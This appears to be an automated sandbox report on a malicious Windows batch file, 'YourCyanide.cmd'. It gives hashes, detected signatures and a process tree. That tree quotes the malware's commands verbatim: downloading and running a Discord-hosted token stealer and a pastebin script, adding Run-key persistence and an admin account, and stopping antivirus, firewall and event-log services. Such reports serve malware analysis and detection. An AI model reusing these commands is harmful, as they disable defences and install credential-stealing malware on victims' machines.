Resubmissions
15-11-2024 12:51 241115-p3ywnsthmh 9
18-05-2022 00:35 220518-axmh5abbc9 10
18-05-2022 00:32 220518-avncmsbbb7 10
Analysis
- max time kernel: 97s
- max time network: 100s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 18-05-2022 00:32
Static task: static1
Behavioral task: behavioral1
Sample: YourCyanide.cmd
Resource: win7-20220414-en
Behavioral task: behavioral2
Sample: YourCyanide.cmd
Resource: win10v2004-20220414-en
General
- Target: YourCyanide.cmd
- Size: 90KB
- MD5: 4cb725f17bec289507f9e8249c8ea80e
- SHA1: a7034e84cb884bf90e61ce3b621424bec57334ae
- SHA256: 1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
- SHA512: 776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
Malware Config
Extracted
https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
Extracted
C:\Users\Admin\Desktop\YcynNote.txt
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
flow pid Process
24 3048 powershell.exe
34 3556 powershell.exe
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process
648 GetToken.exe
-
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4350_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd" reg.exe
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4487_toolbar = "ycynlog.cmd" reg.exe
Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat" reg.exe
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 2 IoCs
description ioc Process
File opened for modification C:\Windows\win.ini cmd.exe
File opened for modification C:\Windows\system.ini cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process
1436 taskkill.exe
-
Modifies registry class 2 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings cmd.exe
Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\MuiCache ShellExperienceHost.exe
-
Modifies registry key 1 TTPs 1 IoCs
pid Process
2312 reg.exe
-
NTFS ADS 4 IoCs
description ioc Process
File opened for modification C:\Users\Admin\%onRsx:~13 cmd.exe
File opened for modification C:\Users\Admin\%RafEw:~4 cmd.exe
File opened for modification C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24 cmd.exe
File opened for modification C:\Users\Admin\%ONRsX:~13 cmd.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 54 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process
Token: SeDebugPrivilege 636 powershell.exe
Token: SeDebugPrivilege 1436 taskkill.exe
Token: SeDebugPrivilege 3048 powershell.exe
Token: SeDebugPrivilege 4960 powershell.exe
Token: SeDebugPrivilege 3676 netsh.exe
Token: SeDebugPrivilege 3436 powershell.exe
Token: SeDebugPrivilege 2216 powershell.exe
Token: SeDebugPrivilege 3024 powershell.exe
Token: SeDebugPrivilege 3556 powershell.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process
4636 ShellExperienceHost.exe
4636 ShellExperienceHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process
1144 attrib.exe
2760 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
PID:1144
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:5060
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1732
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1480
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5004
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4832
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:4980
-
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4350_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵
- Adds Run key to start application
PID:1960
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:1588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4784
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:2284
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵PID:2924
-
-
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:3348
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵PID:3988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:3780
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:4396
-
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵PID:1580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵PID:1892
-
-
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵PID:4272
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:4516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:3712
-
-
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵PID:3996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵PID:3368
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵PID:1248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵PID:3224
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵PID:2124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵PID:4448
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:1880
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵PID:636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵PID:3624
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵PID:3104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵PID:1588
-
-
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵PID:3416
-
-
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵PID:4752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵PID:4384
-
-
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵PID:4376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵PID:2680
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:2972
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:3436
-
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵PID:1780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵PID:4628
-
-
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵PID:1928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵PID:1472
-
-
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵PID:800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵PID:1484
-
-
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵PID:3760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵PID:1604
-
-
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵PID:3144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵PID:4852
-
-
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵PID:612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵PID:1444
-
-
-
C:\Windows\system32\net.exenet stop srservice /y2⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵PID:4644
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵PID:1188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵PID:1796
-
-
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵PID:2816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵PID:4716
-
-
-
C:\Windows\system32\net.exenet stop MskService /y2⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵PID:3844
-
-
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵PID:2880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵PID:4276
-
-
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵PID:1944
-
-
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵PID:3120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵PID:3716
-
-
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵PID:3712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵PID:3460
-
-
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵PID:4068
-
-
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:5072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵PID:992
-
-
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵PID:1248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵PID:4932
-
-
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵PID:4456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵PID:3544
-
-
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵PID:1516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵PID:2020
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:2224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:4996
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:2080
-
-
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵PID:4956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵PID:4640
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:4784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:3728
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:4356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:4808
-
-
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵PID:1848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵PID:4044
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵PID:4160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵PID:3176
-
-
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵PID:4336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵PID:2120
-
-
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵PID:1032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵PID:2188
-
-
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵PID:3684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵PID:2424
-
-
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵PID:3988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵PID:2140
-
-
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵PID:900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵PID:612
-
-
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵PID:4628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵PID:2128
-
-
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵PID:4052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵PID:1440
-
-
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵PID:2424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵PID:2232
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:4776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:2104
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:4768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:1844
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵PID:3836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵PID:2160
-
-
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵PID:2204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵PID:1892
-
-
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵PID:3564
-
-
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵PID:4676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵PID:1860
-
-
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵PID:3412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵PID:4204
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵PID:3720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵PID:4720
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵PID:5060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵PID:4324
-
-
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵PID:4268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵PID:1248
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:3124
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵PID:1880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵PID:3912
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵PID:4220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵PID:3676
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵PID:3508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵PID:4340
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵PID:4348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵PID:4376
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:2120
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵PID:3384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵PID:4628
-
-
-
C:\Windows\system32\net.exenet stop netsvcs2⤵PID:3560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵PID:1128
-
-
-
C:\Windows\system32\net.exenet stop spoolnt2⤵PID:3684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵PID:2424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵PID:1100
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1892
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2700
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4268
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4352
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4384
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2680
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2960
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:720
-
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:996
-
-
C:\Windows\system32\tskill.exetskill iexplore2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1796
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Windows\system32\tskill.exetskill excel2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
C:\Windows\system32\tskill.exetskill iTunes2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1620
-
-
C:\Windows\system32\tskill.exetskill calc2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
-
C:\Windows\system32\tskill.exetskill msaccess2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2616
-
-
C:\Windows\system32\tskill.exetskill safari2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3376
-
-
C:\Windows\system32\tskill.exetskill mspaint2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
C:\Windows\system32\tskill.exetskill outlook2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4932
-
-
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Windows\system32\tskill.exetskill firefox2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
C:\Windows\system32\tskill.exetskill LimreWire2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵PID:3008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵PID:4052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K ycynlog.cmd2⤵
- NTFS ADS
PID:3012
-
C:\Windows\system32\attrib.exeattrib +h +s ycynlog.cmd3⤵
- Views/modifies file attributes
PID:2760
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4487_toolbar" /t "REG_SZ" /d ycynlog.cmd /f3⤵
- Adds Run key to start application
PID:4336
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:2312
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f3⤵PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Users\Admin\GetToken.exeGetToken.exe3⤵
- Executes dropped EXE
PID:648
-
-
C:\Windows\system32\curl.execurl -s -o IP.txt https://ipv4.wtfismyip.com/text3⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:3676
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:996
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3272
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3592
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:1348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:1944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:2148
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3508
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:2960
-
-
